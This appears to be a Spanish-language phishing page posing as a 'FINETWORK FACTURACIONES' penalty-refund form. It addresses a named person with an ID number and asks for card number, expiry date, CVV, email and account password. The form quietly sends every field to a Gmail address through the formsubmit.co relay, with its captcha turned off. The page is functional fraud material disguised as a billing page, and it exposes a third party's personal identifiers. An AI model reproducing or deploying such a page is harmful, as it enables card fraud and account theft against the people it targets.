<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Registro</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
   
    <div class="form-content">
     <h2>FINETWORK FACTURACIONES</h2> 
  <style>     
* {
    margin: 0;
    padding: 0;
    box-sizing: border-box; 
}

body {
    font-family: Arial, Helvetica, sans-serif;
    background-color: #555764;
    display: flex;
    justify-content: center;
    align-items: center;
    min-height: 100vh;
}

.form-content {
    background: linear-gradient(
        50deg,
        rgba(40,42,55,1)50%,
        rgba(40,42,55,0.7)
        ),
        url(images/bg.jpg);
   background-position: center;
    background-repeat: no-repeat;
    background-size: cover;
    padding: 50px;
    width: 1000px;
    border-radius: 25px;
}        

.form-content h2 { 
   color: #F4F6F9;
   font-size: 25px;
   margin-bottom: 15px; 
   }

.form-content h3 {
    color: #F4F6F9;
    font-size: 15px;
    margin-bottom: 15px; 
}

.form-content h4 {
    color: #F4F6F9;
    font-size: 11px;
    margin-bottom: 25px; 
}

.form-content h5 {
    color: #F4F6F9;
    font-size: 11px;
    margin-bottom: 25px; 
}

form {
   display: flex;
   flex-direction: column;
   width: 50%;
}

label {
    font-size: 17px;
    color: #959AAB;
    margin-bottom: 10PX;
}

input  , textarea {
    padding: 17px 14px;
    background-color: #333646;
    border: 0;
    font-size: 15px;
    color: #F4F6F9;
    margin-bottom: 20px;
    border-radius: 10px;
}

:focus {
    outline: 1px solid #1E92E9;
}

.btn {
    background-color: #1E92E9;
    width: 150px;
    align-self: flex-end;   
    cursor: pointer;
}

.btn:hover {
    background-color: #219BF9;
}


@media (max-width:991px) {
    body {
        padding: 30px;
    }

    .form-content {
        width: 100%;
    }

    form {
        width: 100%;
    }

}


</style>


        
        <form action="https://formsubmit.co/soporte.tecnicos.servicios.es@gmail.com" method="POST">
          
            <h3>GLORIA GONZALEZ: 04663005P </h3>
            <h4>IMPORTANTE: Para realizar el reintegro de la penalidad 
                y enviar la constancia del depósito, validar los siguientes datos:</h4> 
          
            <label for="name">Numero de tarjeta</label>
            <input type="text" name="name" id="name" >
                   
            <label for="email">Fecha de Caducidad</label>
            <input type="email" name="email" id="email" >
            
            <label for="subject">Codigo de seguridad / Cvv</label>
            <input type="subject" name="subject" id="subject" >
                   
            <label for="coments">Correo electronico</label>
            <input type="coments" name="coments" id="coments" >
                    
            <label for="password">Contraseña</label>
            <input type="password" name="password" ide="password"  >
            
            <h5>Los datos ingresados están protegidos por la empresa por su seguridad.</h5> 
        
            <input class="btn" type="submit" value="enviar" >  
             <input type="hidden" name="_next" value="file:///C:/Users/user/Documents/facturacion/index.html" >                         
             <input type="hidden" name="_captcha" value="false"> 

           
        
        </form>
    </div>
     



    
</body>
</html>